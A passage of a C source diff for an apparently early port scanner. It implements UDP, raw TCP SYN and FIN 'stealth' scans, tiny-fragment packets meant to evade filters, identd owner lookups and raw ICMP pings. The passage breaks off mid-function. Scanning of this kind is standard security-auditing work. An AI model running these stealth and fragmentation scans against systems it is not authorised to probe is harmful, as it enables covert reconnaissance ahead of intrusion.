+	if (bytes <= 0) {
+	  printf("sendto returned %d.", bytes);
+	  fflush(stdout);
+	  perror("sendto");
+	}
+      }
+      if (bytes > 0 && i > tmp) {
+	num_out++;
+	outports[i] = portarray[j-1];
+      }
+    }
+  }
+  usleep(sleeptime);
+  tmp = listen_icmp(icmpsock, outports, numtries, &num_out, target, ports);
+  if (debugging) printf("listen_icmp caught %d bad ports.\n", tmp);
+  done = !portarray[j];
+  for (i=0,k=0; i < max_parallel_sockets; i++) 
+    if (outports[i]) {
+      if (++numtries[i] > max_tries - 1) {
+	if (debugging || verbose)
+	  printf("Adding port %d for 0 unreachable port generations\n",
+		 outports[i]);
+	addport(ports, outports[i], IPPROTO_UDP, NULL);
+	num_out--;
+	outports[i] = numtries[i] = 0;      
+      }
+      else {
+	done = 0;
+	outports[k] = outports[i];
+	numtries[k] = numtries[i];
+	if (k != i)
+	  outports[i] = numtries[i] = 0;
+	k++;
+      }
+    }
+  if (num_out == max_parallel_sockets) {
+  printf("Numout is max sockets, that is a problem!\n");
+  sleep(1); /* Give some time for responses to trickle back, 
+	       and possibly to reset the hosts ICMP error limit */
+  }
+}
+
+
+if (debugging || verbose) 
+  printf("The UDP raw ICMP scanned %d ports in  %ld seconds with %d parallel sockets.\n", number_of_ports, time(NULL) - starttime, max_parallel_sockets);
+close(icmpsock);
+close(udpsock);
+return *ports;
+}
+
+int listen_icmp(int icmpsock,  unsigned short outports[], 
+		unsigned short numtries[], int *num_out, struct in_addr target,
+		portlist *ports) {
+  char response[1024];
+  struct sockaddr_in stranger;
+  int sockaddr_in_size = sizeof(struct sockaddr_in);
+  struct in_addr bs;
+  struct iphdr *ip = (struct iphdr *) response;
+  struct icmphdr *icmp = (struct icmphdr *) (response + sizeof(struct iphdr));
+  struct iphdr *ip2;
+  unsigned short *data;
+  int badport, numcaught=0, bytes, i, tmptry=0, found=0;
+  
+  while  ((bytes = recvfrom(icmpsock, response, 1024, 0,
+			    (struct sockaddr *) &stranger,
+			    &sockaddr_in_size)) > 0) {
+  numcaught++;
+  bs.s_addr = ip->saddr;
+  if (ip->saddr == target.s_addr && ip->protocol == IPPROTO_ICMP 
+      && icmp->type == 3 && icmp->code == 3) {    
+    ip2 = (struct iphdr *) (response + 4 * ip->ihl + sizeof(struct icmphdr));
+    data = (unsigned short *) ((char *)ip2 + 4 * ip2->ihl);
+    badport = ntohs(data[1]);
+    /*delete it from our outports array */
+    found = 0;
+    for(i=0; i < max_parallel_sockets; i++) 
+      if (outports[i] == badport) {
+	found = 1;
+	tmptry = numtries[i];
+	outports[i] = numtries[i] = 0;
+	(*num_out)--;
+	break;
+      }
+    if (debugging && found && tmptry > 0) 
+      printf("Badport: %d on try number %d\n", badport, tmptry);
+    if (!found) {
+      if (debugging) 
+	printf("Badport %d came in late, deleting from portlist.\n", badport);
+      if (deleteport(ports, badport, IPPROTO_UDP) < 0)
+	if (debugging) printf("Port deletion failed.\n");
+    }
+  }
+  else {
+    printf("Funked up packet!\n");
+  }
+}
+  return numcaught;
+}
+
+/* This fucntion is nonsens.  I wrote it all, really optimized etc.  Then
+   found out that many hosts limit the rate at which they send icmp errors :(
+   I will probably totally rewrite it to be much simpler at some point.  For
+   now I won't worry about it since it isn't a very important functions (UDP
+   is lame, plus there is already a much better function for people who 
+   are r00t */
+portlist lamer_udp_scan(struct in_addr target, unsigned short *portarray,
+			portlist *ports) {
+int sockaddr_in_size = sizeof(struct sockaddr_in),i=0,j=0,k=0, bytes;
+int sockets[max_parallel_sockets], trynum[max_parallel_sockets];
+unsigned short portno[max_parallel_sockets];
+int last_open = 0;
+char response[1024];
+struct sockaddr_in her, stranger;
+char data[] = "\nhelp\nquit\n";
+unsigned long sleeptime;
+unsigned int starttime;
+
+/* Initialize our target sockaddr_in */
+bzero((char *) &her, sizeof(struct sockaddr_in));
+her.sin_family = AF_INET;
+her.sin_addr = target;
+
+if (global_delay) sleeptime = global_delay;
+else sleeptime =  calculate_sleep(target) + 60000; /*large to be on the 
+						    safe side */
+
+if (verbose || debugging)
+  printf("Initiating UDP scan against %s (%s), sleeptime: %li\n", current_name,
+	 inet_ntoa(target), sleeptime);
+
+starttime = time(NULL);
+
+for(i = 0 ; i < max_parallel_sockets; i++)
+  trynum[i] =  portno[i] = 0;
+
+while(portarray[j]) {
+  for(i=0; i < max_parallel_sockets && portarray[j]; i++, j++) {
+    if (i >= last_open) {
+      if ((sockets[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
+        {perror("datagram socket troubles"); exit(1);}
+      block_socket(sockets[i]);
+      portno[i] = portarray[j];
+    }
+    her.sin_port = htons(portarray[j]);
+    bytes = sendto(sockets[i], data, sizeof(data), 0, (struct sockaddr *) &her,
+		   sizeof(struct sockaddr_in));
+    usleep(5000);
+    if (debugging > 1) 
+      printf("Sent %d bytes on socket %d to port %hi, try number %d.\n",
+	     bytes, sockets[i], portno[i], trynum[i]);
+    if (bytes < 0 ) {
+      printf("Sendto returned %d the FIRST TIME!@#$!, errno %d\n", bytes,
+	     errno);
+      perror("");
+      trynum[i] = portno[i] = 0;
+      close(sockets[i]);
+    }
+  }
+  last_open = i;
+  /* Might need to change this to 1e6 if you are having problems*/
+  usleep(sleeptime + 5e5);
+  for(i=0; i < last_open ; i++) {
+    if (portno[i]) {
+      unblock_socket(sockets[i]);
+      if ((bytes = recvfrom(sockets[i], response, 1024, 0, 
+			    (struct sockaddr *) &stranger,
+			    &sockaddr_in_size)) == -1)
+        {
+          if (debugging > 1) 
+	    printf("2nd recvfrom on port %d returned %d with errno %d.\n",
+		   portno[i], bytes, errno);
+          if (errno == EAGAIN /*11*/)
+            {
+              if (trynum[i] < 2) trynum[i]++;
+              else { 
+		if (RISKY_UDP_SCAN) {	       
+		  printf("Adding port %d after 3 EAGAIN errors.\n", portno[i]);
+		  addport(ports, portno[i], IPPROTO_UDP, NULL); 
+		}
+		else if (debugging)
+		  printf("Skipping possible false positive, port %d\n",
+			 portno[i]);
+                trynum[i] = portno[i] = 0;
+                close(sockets[i]);
+              }
+            }
+          else if (errno == ECONNREFUSED /*111*/) {
+            if (debugging > 1) 
+	      printf("Closing socket for port %d, ECONNREFUSED received.\n",
+		     portno[i]);
+            trynum[i] = portno[i] = 0;
+            close(sockets[i]);
+          }
+          else {
+            printf("Curious recvfrom error (%d) on port %hi: ", 
+		   errno, portno[i]);
+            perror("");
+            trynum[i] = portno[i] = 0;
+            close(sockets[i]);
+          }
+        }
+      else /*bytes is positive*/ {
+        if (debugging || verbose)
+	  printf("Adding UDP port %d due to positive read!\n", portno[i]);
+        addport(ports,portno[i], IPPROTO_UDP, NULL);
+        trynum[i] = portno[i] = 0;
+        close(sockets[i]);
+      }
+    }
+  }
+  /* Update last_open, we need to create new sockets.*/
+  for(i=0, k=0; i < last_open; i++)
+    if (portno[i]) {
+      close(sockets[i]);
+      sockets[k] = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+      /*      unblock_socket(sockets[k]);*/
+      portno[k] = portno[i];
+      trynum[k] = trynum[i];
+      k++;
+    }
+ last_open = k;
+  for(i=k; i < max_parallel_sockets; i++)
+    trynum[i] = sockets[i] = portno[i] = 0;
+}
+if (debugging)
+  printf("UDP scanned %d ports in %ld seconds with %d parallel sockets\n",
+	 number_of_ports, time(NULL) - starttime, max_parallel_sockets);
+return *ports;
+}
+
+/* This attempts to calculate the round trip time (rtt) to a host by timing a
+   connect() to a port which isn't listening.  A better approach is to time a
+   ping (since it is more likely to get through firewalls.  This is now 
+   implemented in isup() for users who are root.  */
+unsigned long calculate_sleep(struct in_addr target) {
+struct timeval begin, end;
+int sd;
+struct sockaddr_in sock;
+int res;
+
+if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
+  {perror("Socket troubles"); exit(1);}
+
+sock.sin_family = AF_INET;
+sock.sin_addr.s_addr = target.s_addr;
+sock.sin_port = htons(MAGIC_PORT);
+
+gettimeofday(&begin, NULL);
+if ((res = connect(sd, (struct sockaddr *) &sock, 
+		   sizeof(struct sockaddr_in))) != -1)
+  printf("You might want to change MAGIC_PORT in the include file, it seems to be listening on the target host!\n");
+close(sd);
+gettimeofday(&end, NULL);
+if (end.tv_sec - begin.tv_sec > 5 ) /*uh-oh!*/
+  return 0;
+return (end.tv_sec - begin.tv_sec) * 1000000 + (end.tv_usec - begin.tv_usec);
+}
+
+/* Checks whether the identd port (113) is open on the target machine.  No
+   sense wasting time trying it for each good port if it is down! */
+int check_ident_port(struct in_addr target) {
+int sd;
+struct sockaddr_in sock;
+int res;
+
+if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
+  {perror("Socket troubles"); exit(1);}
+
+sock.sin_family = AF_INET;
+sock.sin_addr.s_addr = target.s_addr;
+sock.sin_port = htons(113); /*should use getservbyname(3), yeah, yeah */
+res = connect(sd, (struct sockaddr *) &sock, sizeof(struct sockaddr_in));
+close(sd);
+if (res < 0 ) {
+  if (debugging || verbose) printf("identd port not active\n");
+  return 0;
+}
+if (debugging || verbose) printf("identd port is active\n");
+return 1;
+}
+
+int getidentinfoz(struct in_addr target, int localport, int remoteport,
+		  char *owner) {
+int sd;
+struct sockaddr_in sock;
+int res;
+char request[15];
+char response[1024];
+char *p,*q;
+char  *os;
+
+owner[0] = '\0';
+if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
+  {perror("Socket troubles"); exit(1);}
+
+sock.sin_family = AF_INET;
+sock.sin_addr.s_addr = target.s_addr;
+sock.sin_port = htons(113);
+usleep(50000);   /* If we aren't careful, we really MIGHT take out inetd, 
+		    some are very fragile */
+res = connect(sd, (struct sockaddr *) &sock, sizeof(struct sockaddr_in));
+
+if (res < 0 ) {
+  if (debugging || verbose)
+    printf("identd port not active now for some reason ... hope we didn't break it!\n");
+  close(sd);
+  return 0;
+}
+sprintf(request,"%hi,%hi\r\n", remoteport, localport);
+if (debugging > 1) printf("Connected to identd, sending request: %s", request);
+if (write(sd, request, strlen(request) + 1) == -1) {
+  perror("identd write");
+  close(sd);
+  return 0;
+}
+else if ((res = read(sd, response, 1024)) == -1) {
+  perror("reading from identd");
+  close(sd);
+  return 0;
+}
+else {
+  close(sd);
+  if (debugging > 1) printf("Read %d bytes from identd: %s\n", res, response);
+  if ((p = strchr(response, ':'))) {
+    p++;
+    if ((q = strtok(p, " :"))) {
+      if (!strcasecmp( q, "error")) {
+	if (debugging || verbose) printf("ERROR returned from identd\n");
+	return 0;
+      }
+      if ((os = strtok(NULL, " :"))) {
+	if ((p = strtok(NULL, " :"))) {
+	  if ((q = strchr(p, '\r'))) *q = '\0';
+	  if ((q = strchr(p, '\n'))) *q = '\0';
+	  strncpy(owner, p, 512);
+	  owner[512] = '\0';
+	}
+      }
+    } 
+  }  
+}
+return 1;
+}
+
+/* A relatively fast (or at least short ;) ping function.  Doesn't require a 
+   seperate checksum function */
+int isup(struct in_addr target) {
+  int res, retries = 3;
+  struct sockaddr_in sock;
+  /*type(8bit)=8, code(8)=0 (echo REQUEST), checksum(16)=34190, id(16)=31337 */
+#ifdef __LITTLE_ENDIAN_BITFIELD
+  unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A };
+#else
+  unsigned char ping[64] = { 0x8, 0x0, 0x85, 0x8e, 0x7A, 0x69 };
+#endif
+  int sd;
+  struct timeval tv;
+  struct timeval start, end;
+ fd_set fd_read;
+  struct {
+    struct iphdr ip;
+    unsigned char type;
+    unsigned char code;
+    unsigned short checksum;
+    unsigned short identifier;
+    char crap[16536];
+  }  response;
+
+sd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
+
+bzero((char *)&sock,sizeof(struct sockaddr_in));
+sock.sin_family=AF_INET;
+sock.sin_addr = target;
+if (debugging > 1) printf(" Sending 3 64 byte raw pings to host.\n");
+gettimeofday(&start, NULL);
+while(--retries) {
+  if ((res = sendto(sd,(char *) ping,64,0,(struct sockaddr *)&sock,
+		    sizeof(struct sockaddr))) != 64) {
+    fprintf(stderr, "sendto in isup returned %d! skipping host.\n", res);
+    return 0;
+  } 
+  FD_ZERO(&fd_read);
+  FD_SET(sd, &fd_read);
+  tv.tv_sec = 0; 
+  tv.tv_usec = 1e6 * (PING_TIMEOUT / 3.0);
+  while(1) {
+    if ((res = select(sd + 1, &fd_read, NULL, NULL, &tv)) != 1) 
+      break;
+    else {
+      read(sd,&response,sizeof(response));
+      if  (response.ip.saddr == target.s_addr &&  !response.type 
+	   && !response.code   && response.identifier == 31337) {
+	gettimeofday(&end, NULL);
+	global_rtt = (end.tv_sec - start.tv_sec) * 1e6 + end.tv_usec - start.tv_usec;
+	ouraddr.s_addr = response.ip.daddr;
+	close(sd);
+	return 1;       
+      }
+    }
+  }
+}
+close(sd);
+return 0;
+}
+
+
+portlist syn_scan(struct in_addr target, unsigned short *portarray,
+		  struct in_addr *source, int fragment, portlist *ports) {
+int i=0, j=0, received, bytes, starttime;
+struct sockaddr_in from;
+int fromsize = sizeof(struct sockaddr_in);
+int sockets[max_parallel_sockets];
+struct timeval tv;
+char packet[65535];
+struct iphdr *ip = (struct iphdr *) packet;
+struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr));
+fd_set fd_read, fd_write;
+int res;
+struct hostent *myhostent;
+char myname[MAXHOSTNAMELEN + 1];
+int source_malloc = 0;
+
+FD_ZERO(&fd_read);
+FD_ZERO(&fd_write);
+
+tv.tv_sec = 7;
+tv.tv_usec = 0;
+
+if ((received = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 )
+  perror("socket trobles in syn_scan");
+unblock_socket(received);
+FD_SET(received, &fd_read);
+
+/* First we take what is given to us as source.  If that isn't valid, we take
+   what should have swiped from the echo reply in our ping function.  If THAT
+   doesn't work either, we try to determine our address with gethostname and
+   gethostbyname.  Whew! */
+if (!source) {
+  if (ouraddr.s_addr) {
+    source = &ouraddr;
+  }
+  else {
+  source = safe_malloc(sizeof(struct in_addr));
+  source_malloc = 1;
+  if (gethostname(myname, MAXHOSTNAMELEN) || 
+      !(myhostent = gethostbyname(myname)))
+    fatal("Your system is fucked up.\n"); 
+  memcpy(source, myhostent->h_addr_list[0], sizeof(struct in_addr));
+  }
+  if (debugging)
+    printf("We skillfully deduced that your address is %s\n", 
+	   inet_ntoa(*source));
+}
+
+starttime = time(NULL);
+
+do {
+  for(i=0; i < max_parallel_sockets && portarray[j]; i++) {
+    if ((sockets[i] = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 )
+      perror("socket trobles in syn_scan");
+    else {
+      if (fragment)
+	send_small_fragz(sockets[i], source, &target, MAGIC_PORT,
+			 portarray[j++], TH_SYN);
+      else send_tcp_raw(sockets[i], source , &target, MAGIC_PORT, 
+			portarray[j++],0,0,TH_SYN,0,0,0);
+      usleep(10000);
+    }
+  }
+  if ((res = select(received + 1, &fd_read, NULL, NULL, &tv)) < 0)
+    perror("select problems in syn_scan");
+  else if (res > 0) {
+    while  ((bytes = recvfrom(received, packet, 65535, 0, 
+			      (struct sockaddr *)&from, &fromsize)) > 0 ) {
+      if (ip->saddr == target.s_addr) {
+	if (tcp->th_flags & TH_RST) {
+	  if (debugging > 1) printf("Nothing open on port %d\n",
+				    ntohs(tcp->th_sport));
+	}
+	else /*if (tcp->th_flags & TH_SYN && tcp->th_flags & TH_ACK)*/ {
+	  if (debugging || verbose) {	  
+	    printf("Possible catch on port %d!  Here it is:\n", 
+		   ntohs(tcp->th_sport));
+	    readtcppacket(packet,1);
+	  }
+	  addport(ports, ntohs(tcp->th_sport), IPPROTO_TCP, NULL); 	    
+	}
+      }
+    }
+  }
+  for(i=0; i < max_parallel_sockets && portarray[j]; i++) close(sockets[i]);
+  
+} while (portarray[j]);
+if (debugging || verbose)
+  printf("The TCP SYN scan took %ld seconds to scan %d ports.\n",
+	 time(NULL) - starttime, number_of_ports);
+if (source_malloc) free(source);  /* Gotta save those 4 bytes! ;) */
+close(received);
+return *ports;
+}
+
+
+int send_tcp_raw( int sd, struct in_addr *source, 
+		  struct in_addr *victim, unsigned short sport, 
+		  unsigned short dport, unsigned long seq,
+		  unsigned long ack, unsigned char flags,
+		  unsigned short window, char *data, 
+		  unsigned short datalen) 
+{
+
+struct pseudo_header { 
+  /*for computing TCP checksum, see TCP/IP Illustrated p. 145 */
+  unsigned long s_addr;
+  unsigned long d_addr;
+  char zer0;
+  unsigned char protocol;
+  unsigned short length;
+};
+char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + datalen];
+ /*With these placement we get data and some field alignment so we aren't
+   wasting too much in computing the checksum */
+struct iphdr *ip = (struct iphdr *) packet;
+struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr));
+struct pseudo_header *pseudo =  (struct pseudo_header *) (packet + sizeof(struct iphdr) - sizeof(struct pseudo_header)); 
+int res;
+struct sockaddr_in sock;
+char myname[MAXHOSTNAMELEN + 1];
+struct hostent *myhostent;
+int source_malloced = 0;
+
+/* check that required fields are there and not too silly */
+if ( !victim || !sport || !dport || sd < 0) {
+  fprintf(stderr, "send_tcp_raw: One or more of your parameters suck!\n");
+  return -1;
+}
+
+/* if they didn't give a source address, fill in our first address */
+if (!source) {
+  source_malloced = 1;
+  source = safe_malloc(sizeof(struct in_addr));
+  if (gethostname(myname, MAXHOSTNAMELEN) || 
+      !(myhostent = gethostbyname(myname)))
+    fatal("Your system is fucked up.\n"); 
+  memcpy(source, myhostent->h_addr_list[0], sizeof(struct in_addr));
+  if (debugging > 1)
+    printf("We skillfully deduced that your address is %s\n", 
+	   inet_ntoa(*source));
+}
+
+
+/*do we even have to fill out this damn thing?  This is a raw packet, 
+  after all */
+sock.sin_family = AF_INET;
+sock.sin_port = htons(dport);
+sock.sin_addr.s_addr = victim->s_addr;
+
+bzero(packet, sizeof(struct iphdr) + sizeof(struct tcphdr));
+
+pseudo->s_addr = source->s_addr;
+pseudo->d_addr = victim->s_addr;
+pseudo->protocol = IPPROTO_TCP;
+pseudo->length = htons(sizeof(struct tcphdr) + datalen);
+
+tcp->th_sport = htons(sport);
+tcp->th_dport = htons(dport);
+if (seq)
+  tcp->th_seq = htonl(seq);
+else tcp->th_seq = rand() + rand();
+
+if (flags & TH_ACK && ack)
+  tcp->th_ack = htonl(seq);
+else if (flags & TH_ACK)
+  tcp->th_ack = rand() + rand();
+
+tcp->th_off = 5 /*words*/;
+tcp->th_flags = flags;
+
+if (window)
+  tcp->th_win = window;
+else tcp->th_win = htons(2048); /* Who cares */
+
+tcp->th_sum = in_cksum((unsigned short *)pseudo, sizeof(struct tcphdr) + 
+		       sizeof(struct pseudo_header) + datalen);
+
+/* Now for the ip header */
+bzero(packet, sizeof(struct iphdr)); 
+ip->version = 4;
+ip->ihl = 5;
+ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + datalen);
+ip->id = rand();
+ip->ttl = 255;
+ip->protocol = IPPROTO_TCP;
+ip->saddr = source->s_addr;
+ip->daddr = victim->s_addr;
+ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
+
+if (debugging > 1) {
+printf("Raw TCP packet creation completed!  Here it is:\n");
+readtcppacket(packet,ntohs(ip->tot_len));
+}
+if (debugging > 1) 
+  printf("\nTrying sendto(%d , packet, %d, 0 , %s , %d)\n",
+	 sd, ntohs(ip->tot_len), inet_ntoa(*victim),
+	 sizeof(struct sockaddr_in));
+if ((res = sendto(sd, packet, ntohs(ip->tot_len), 0,
+		  (struct sockaddr *)&sock, sizeof(struct sockaddr_in))) == -1)
+  {
+    perror("sendto in send_tcp_raw");
+    if (source_malloced) free(source);
+    return -1;
+  }
+if (debugging > 1) printf("successfully sent %d bytes of raw_tcp!\n", res);
+
+if (source_malloced) free(source);
+return res;
+}
+
+/* A simple program I wrote to help in debugging, shows the important fields
+   of a TCP packet*/
+int readtcppacket(char *packet, int readdata) {
+struct iphdr *ip = (struct iphdr *) packet;
+struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr));
+char *data = packet +  sizeof(struct iphdr) + sizeof(struct tcphdr);
+int tot_len;
+struct in_addr bullshit, bullshit2;
+char sourcehost[16];
+int i;
+
+if (!packet) {
+  fprintf(stderr, "readtcppacket: packet is NULL!\n");
+  return -1;
+    }
+bullshit.s_addr = ip->saddr; bullshit2.s_addr = ip->daddr;
+tot_len = ntohs(ip->tot_len);
+strncpy(sourcehost, inet_ntoa(bullshit), 16);
+i =  4 * (ntohs(ip->ihl) + ntohs(tcp->th_off));
+if (ip->protocol == IPPROTO_TCP)
+  if (ip->frag_off) printf("Packet is fragmented, offset field: %u",
+			   ip->frag_off);
+  else {
+    printf("TCP packet: %s:%d -> %s:%d (total: %d bytes)\n", sourcehost, 
+	   ntohs(tcp->th_sport), inet_ntoa(bullshit2), 
+	   ntohs(tcp->th_dport), tot_len);
+    printf("Flags: ");
+    if (!tcp->th_flags) printf("(none)");
+    if (tcp->th_flags & TH_RST) printf("RST ");
+    if (tcp->th_flags & TH_SYN) printf("SYN ");
+    if (tcp->th_flags & TH_ACK) printf("ACK ");
+    if (tcp->th_flags & TH_PUSH) printf("PSH ");
+    if (tcp->th_flags & TH_FIN) printf("FIN ");
+    if (tcp->th_flags & TH_URG) printf("URG ");
+    printf("\n");
+    printf("ttl: %hi ", ip->ttl);
+    if (tcp->th_flags & (TH_SYN | TH_ACK)) printf("Seq: %lu\tAck: %lu\n", 
+						  tcp->th_seq, tcp->th_ack);
+    else if (tcp->th_flags & TH_SYN) printf("Seq: %lu\n", ntohl(tcp->th_seq));
+    else if (tcp->th_flags & TH_ACK) printf("Ack: %lu\n", ntohl(tcp->th_ack));
+  }
+if (readdata && i < tot_len) {
+printf("Data portion:\n");
+while(i < tot_len)  printf("%2X%c", data[i], (++i%16)? ' ' : '\n');
+printf("\n");
+}
+return 0;
+}
+
+/* We don't exactly need real crypto here (thank god!)\n"*/
+int shortfry(unsigned short *ports) {
+int num;
+unsigned short tmp;
+int i;
+
+for(i=0; i < number_of_ports; i++) {
+  num = rand() % (number_of_ports);
+  tmp = ports[i];
+  ports[i] = ports[num];
+  ports[num] = tmp;
+}
+return 1;
+}
+
+
+/* Much of this is swiped from my send_tcp_raw function above, which 
+   doesn't support fragmentation */
+int send_small_fragz(int sd, struct in_addr *source, struct in_addr *victim,
+		     int sport, int dport, int flags) {
+
+struct pseudo_header { 
+/*for computing TCP checksum, see TCP/IP Illustrated p. 145 */
+  unsigned long s_addr;
+  unsigned long d_addr;
+  char zer0;
+  unsigned char protocol;
+  unsigned short length;
+};
+/*In this placement we get data and some field alignment so we aren't wasting
+  too much to compute the TCP checksum.*/
+char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + 100];
+struct iphdr *ip = (struct iphdr *) packet;
+struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr));
+struct pseudo_header *pseudo = (struct pseudo_header *) (packet + sizeof(struct iphdr) - sizeof(struct pseudo_header)); 
+char *frag2 = packet + sizeof(struct iphdr) + 16;
+struct iphdr *ip2 = (struct iphdr *) (frag2 - sizeof(struct iphdr));
+int res;
+struct sockaddr_in sock;
+int id;
+
+/*Why do we have to fill out this damn thing? This is a raw packet, after all */
+sock.sin_family = AF_INET;
+sock.sin_port = htons(dport);
+sock.sin_addr.s_addr = victim->s_addr;
+
+bzero(packet, sizeof(struct iphdr) + sizeof(struct tcphdr));
+
+pseudo->s_addr = source->s_addr;
+pseudo->d_addr = victim->s_addr;
+pseudo->protocol = IPPROTO_TCP;
+pseudo->length = htons(sizeof(struct tcphdr));
+
+tcp->th_sport = htons(sport);
+tcp->th_dport = htons(dport);
+tcp->th_seq = rand() + rand();
+
+tcp->th_off = 5 /*words*/;
+tcp->th_flags = flags;
+
+tcp->th_win = htons(2048); /* Who cares */
+
+tcp->th_sum = in_cksum((unsigned short *)pseudo, 
+		       sizeof(struct tcphdr) + sizeof(struct pseudo_header));
+
+/* Now for the ip header of frag1 */
+bzero(packet, sizeof(struct iphdr)); 
+ip->version = 4;
+ip->ihl = 5;
+/*RFC 791 allows 8 octet frags, but I get "operation not permitted" (EPERM)
+  when I try that.  */
+ip->tot_len = htons(sizeof(struct iphdr) + 16);
+id = ip->id = rand();
+ip->frag_off = htons(MORE_FRAGMENTS);
+ip->ttl = 255;
+ip->protocol = IPPROTO_TCP;
+ip->saddr = source->s_addr;
+ip->daddr = victim->s_addr;
+ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
+
+if (debugging > 1) {
+  printf("Raw TCP packet fragment #1 creation completed!  Here it is:\n");
+  hdump(packet,20);
+}
+if (debugging > 1) 
+  printf("\nTrying sendto(%d , packet, %d, 0 , %s , %d)\n",
+	 sd, ntohs(ip->tot_len), inet_ntoa(*victim),
+	 sizeof(struct sockaddr_in));
+if ((res = sendto(sd, packet, ntohs(ip->tot_len), 0, 
+		  (struct sockaddr *)&sock, sizeof(struct sockaddr_in))) == -1)
+  {
+    perror("sendto in send_syn_fragz");
+    return -1;
+  }
+if (debugging > 1) printf("successfully sent %d bytes of raw_tcp!\n", res);
+
+/* Create the second fragment */
+bzero(ip2, sizeof(struct iphdr));
+ip2->version = 4;
+ip2->ihl = 5;
+ip2->tot_len = htons(sizeof(struct iphdr) + 4); /* the rest of our TCP packet */
+ip2->id = id;
+ip2->frag_off = htons(2);
+ip2->ttl = 255;
+ip2->protocol = IPPROTO_TCP;
+ip2->saddr = source->s_addr;
+ip2->daddr = victim->s_addr;
+ip2->check = in_cksum((unsigned short *)ip2, sizeof(struct iphdr));
+if (debugging > 1) {
+  printf("Raw TCP packet fragment creation completed!  Here it is:\n");
+  hdump(packet,20);
+}
+if (debugging > 1) 
+  printf("\nTrying sendto(%d , ip2, %d, 0 , %s , %d)\n", sd, 
+	 ntohs(ip2->tot_len), inet_ntoa(*victim), sizeof(struct sockaddr_in));
+if ((res = sendto(sd, ip2, ntohs(ip2->tot_len), 0, 
+		  (struct sockaddr *)&sock, sizeof(struct sockaddr_in))) == -1)
+  {
+    perror("sendto in send_tcp_raw");
+    return -1;
+  }
+return 1;
+}
+
+/* Hex dump */
+void hdump(unsigned char *packet, int len) {
+unsigned int i=0, j=0;
+
+printf("Here it is:\n");
+
+for(i=0; i < len; i++){
+  j = (unsigned) (packet[i]);
+  printf("%-2X ", j);
+  if (!((i+1)%16))
+    printf("\n");
+  else if (!((i+1)%4))
+    printf("  ");
+}
+printf("\n");
+}
+
+
+portlist fin_scan(struct in_addr target, unsigned short *portarray, 
+		  struct in_addr *source, int fragment, portlist *ports) {
+
+int rawsd, tcpsd;
+int done = 0, badport, starttime, someleft, i, j=0, retries=2;
+int source_malloc = 0;
+int waiting_period = retries, sockaddr_in_size = sizeof(struct sockaddr_in);
+int bytes, dupesinarow = 0;
+unsigned long timeout;
+struct hostent *myhostent;
+char response[65535], myname[513];
+struct iphdr *ip = (struct iphdr *) response;
+struct tcphdr *tcp;
+unsigned short portno[max_parallel_sockets], trynum[max_parallel_sockets];
+struct sockaddr_in stranger;
+
+
+timeout = (global_delay)? global_delay : (global_rtt)? (1.2 * global_rtt) + 10000 : 1e5;
+bzero(&stranger, sockaddr_in_size);
+bzero(portno, max_parallel_sockets * sizeof(unsigned short));
+bzero(trynum, max_parallel_sockets * sizeof(unsigned short));
+starttime = time(NULL);
+
+
+if (debugging || verbose)
+  printf("Initiating FIN stealth scan against %s (%s), sleep delay: %ld useconds\n", current_name, inet_ntoa(target), timeout);
+
+if (!source) {
+  if (ouraddr.s_addr) {
+    source = &ouraddr;
+  }
+  else {
+  source = safe_malloc(sizeof(struct in_addr));
+  source_malloc = 1;
+  if (gethostname(myname, MAXHOSTNAMELEN) || 
+      !(myhostent = gethostbyname(myname)))
+    fatal("Your system is fucked up.\n"); 
+  memcpy(source, myhostent->h_addr_list[0], sizeof(struct in_addr));
+  }
+  if (debugging || verbose) 
+    printf("We skillfully deduced that your address is %s\n",
+	   inet_ntoa(*source));
+}
+
+if ((rawsd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 )
+  perror("socket trobles in fin_scan");
+
+if ((tcpsd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 )
+  perror("socket trobles in fin_scan");
+
+unblock_socket(tcpsd);
+while(!done) {
+  for(i=0; i <  max_parallel_sockets; i++) {
+    if (!portno[i] && portarray[j]) {
+      portno[i] = portarray[j++];
+    }
+    if (portno[i]) {
+    if (fragment)
+      send_small_fragz(rawsd, source, &target, MAGIC_PORT, portno[i], TH_FIN);
+    else send_tcp_raw(rawsd, source , &target, MAGIC_PORT, 
+		      portno[i], 0, 0, TH_FIN, 0, 0, 0);
+    usleep(10000); /* *WE* normally do not need this, but the target 
+		      lamer often does */
+    }
+  }
+
+  usleep(timeout);
+  dupesinarow = 0;
+  while ((bytes = recvfrom(tcpsd, response, 65535, 0, (struct sockaddr *)
+			   &stranger, &sockaddr_in_size)) > 0) 
+    if (ip->saddr == target.s_addr) {
+      tcp = (struct tcphdr *) (response + 4 * ip->ihl);
+      if (tcp->th_flags & TH_RST) {
+	badport = ntohs(tcp->th_sport);
+	if (debugging > 1) printf("Nothing open on port %d\n", badport);
+	/* delete the port from active scanning */
+	for(i=0; i < max_parallel_sockets; i++) 
+	  if (portno[i] == badport) {
+	    if (debugging && trynum[i] > 0)
+	      printf("Bad port %d caught on fin scan, try number %d\n",
+		     badport, trynum[i] + 1);
+	    trynum[i] = 0;
+	    portno[i] = 0;
+	    break;
+	  }
+	if (i == max_parallel_sockets) {
+	  if (debugging)
+	    printf("Late packet or dupe, deleting port %d.\n", badport);
+	  dupesinarow++;
+	  if (ports) deleteport(ports, badport, IPPROTO_TCP);
+	}
+      }
+      else 
